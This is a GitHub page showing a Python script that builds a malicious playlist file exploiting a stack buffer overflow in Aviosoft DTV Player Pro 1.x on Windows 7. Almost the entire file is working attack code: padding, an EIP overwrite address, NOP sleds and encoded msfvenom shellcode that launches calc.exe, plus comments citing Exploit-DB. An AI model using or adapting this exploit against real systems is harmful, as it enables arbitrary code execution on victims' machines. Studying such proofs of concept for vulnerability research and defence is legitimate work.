random-exploits/adtv-exploit.py at master · BlueTeamSteve/random-exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/env python3
# Stack bof exploit for Aviosoft DTV Player Pro 1.x
# Tested working Win 7 SP1 x64 fully patched
# A hacky hack by BleepSec
# https://www.exploit-db.com/exploits/22932
# https://www.exploit-db.com/apps/55740fe6c4e56674125a1968a139ed36-AviosoftDTVPlayerPro.exe
# badchars = b"\x00\x0a\x1a"
# Shellcode = msfvenom -p windows/exec -a x86 --platform windows -b '\x00\x0a\x1a' -f python -e x86/shikata_ga_nai CMD=calc.exe EXITFUNC=thread

plf_file = "/media/sf_VM_Shared/AviosoftDTV/exploit.plf"

buf = b""
buf += b"http://"
buf += b"A"*253 # Junk data starting with http://
buf += b"\xe3\x14\x06\x64" # EIP overwrite
buf += b"\x90"*16 # NOP to ESP
buf += b"\x90"*40 # NOP sled for shellcode
buf += b"\xd9\xc9\xd9\x74\x24\xf4\x5d\x33\xc9\xbb\x90\x73\x6e" # Shellcode
buf += b"\xf1\xb1\x31\x31\x5d\x18\x83\xc5\x04\x03\x5d\x84\x91"
buf += b"\x9b\x0d\x4c\xd7\x64\xee\x8c\xb8\xed\x0b\xbd\xf8\x8a"
buf += b"\x58\xed\xc8\xd9\x0d\x01\xa2\x8c\xa5\x92\xc6\x18\xc9"
buf += b"\x13\x6c\x7f\xe4\xa4\xdd\x43\x67\x26\x1c\x90\x47\x17"
buf += b"\xef\xe5\x86\x50\x12\x07\xda\x09\x58\xba\xcb\x3e\x14"
buf += b"\x07\x67\x0c\xb8\x0f\x94\xc4\xbb\x3e\x0b\x5f\xe2\xe0"
buf += b"\xad\x8c\x9e\xa8\xb5\xd1\x9b\x63\x4d\x21\x57\x72\x87"
buf += b"\x78\x98\xd9\xe6\xb5\x6b\x23\x2e\x71\x94\x56\x46\x82"
buf += b"\x29\x61\x9d\xf9\xf5\xe4\x06\x59\x7d\x5e\xe3\x58\x52"
buf += b"\x39\x60\x56\x1f\x4d\x2e\x7a\x9e\x82\x44\x86\x2b\x25"
buf += b"\x8b\x0f\x6f\x02\x0f\x54\x2b\x2b\x16\x30\x9a\x54\x48"
buf += b"\x9b\x43\xf1\x02\x31\x97\x88\x48\x5f\x66\x1e\xf7\x2d"
buf += b"\x68\x20\xf8\x01\x01\x11\x73\xce\x56\xae\x56\xab\xb9"
buf += b"\x4c\x73\xc1\x51\xc9\x16\x68\x3c\xea\xcc\xae\x39\x69"
buf += b"\xe5\x4e\xbe\x71\x8c\x4b\xfa\x35\x7c\x21\x93\xd3\x82"
buf += b"\x96\x94\xf1\xe0\x79\x07\x99\xc8\x1c\xaf\x38\x15"

f = open(plf_file, "wb")
f.write(buf)
f.close()